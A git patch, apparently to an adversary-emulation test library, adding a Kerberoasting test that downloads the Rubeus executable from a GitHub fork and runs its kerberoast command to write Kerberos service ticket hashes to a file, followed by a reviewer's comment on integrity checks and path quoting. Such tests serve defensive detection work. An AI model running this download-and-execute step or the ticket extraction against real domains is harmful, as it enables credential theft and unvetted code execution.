From ad98393d8b44d02f422e76927901e8ea30b71c96 Mon Sep 17 00:00:00 2001
From: Brandon Morgan
Date: Fri, 20 Aug 2021 15:17:49 -0500
Subject: [PATCH] rubeus-kerberoasting (#1609)
Co-authored-by: Carrie Roberts
---
 atomics/T1558.003/T1558.003.yaml | 48 ++++++++++++++++++++++++++++++++
 1 file changed, 48 insertions(+)
diff --git a/atomics/T1558.003/T1558.003.yaml b/atomics/T1558.003/T1558.003.yaml
index 58abe080..597849a6 100644
--- a/atomics/T1558.003/T1558.003.yaml
+++ b/atomics/T1558.003/T1558.003.yaml
@@ -26,3 +26,51 @@ atomic_tests:
 Invoke-Kerberoast | fl
 name: powershell
+- name: Rubeus kerberoast
+ description: |
+ Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast
+ This build targets .NET 4.5. If targeting a different version you will need to compile Rubeus
+ supported_platforms:
+ - windows
+ input_arguments:
+ local_folder:
+ description: Local path of Rubeus executable
+ type: Path
+ default: $Env:temp
+ local_executable:
+ description: name of the rubeus executable
+ type: String
+ default: 'rubeus.exe'
+ out_file:
+ description: file where command results are stored
+ type: String
+ default: rubeus_output.txt
+ rubeus_url:
+ description: URL of Rubeus executable
+ type: url
+ default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe
+ flags:
+ description: command flags you would like to run (optional and blank by default)
+ type: String
+ default:
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ Computer must be domain joined
+ prereq_command: |
+ if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+ get_prereq_command: |
+ Write-Host Joining this computer to a domain must be done manually
+ - description: |
+ Rubeus must exist
+ prereq_command: |
+ if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
+ executor:
+ command: |
+ cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}"
+ cleanup_command: |
+ Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore
+ name: powershell
+ elevation_required: false
\ No newline at end of file
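Review bot: The `get_prereq_command` of the "Rubeus must exist" dependency downloads a prebuilt Debug executable from a personal fork (the `rubeus_url` default), and the executor then runs it with no integrity check on the downloaded file. The URL is pinned to a commit, but a hash check after the download would make the expectation explicit and catch a substituted `rubeus_url`, e.g. `if((Get-FileHash "#{local_folder}\#{local_executable}" -Algorithm SHA256).Hash -ne '<EXPECTED_SHA256_PLACEHOLDER>') {Remove-Item "#{local_folder}\#{local_executable}"; exit 1}`, with the expected value recorded next to `rubeus_url`. Separately, `Test-Path`, `Invoke-Webrequest -OutFile` and `Remove-Item` pass `#{local_folder}\#{local_executable}` (or `#{out_file}`) unquoted while the executor quotes the same paths, so a temp path containing spaces would likely fail the prereq and the cleanup; quoting them the same way keeps the three consistent. The `cleanup_command` removes only the output file and leaves the downloaded executable in `#{local_folder}`, which deserves a line in the test description so whoever runs it knows to remove it afterwards.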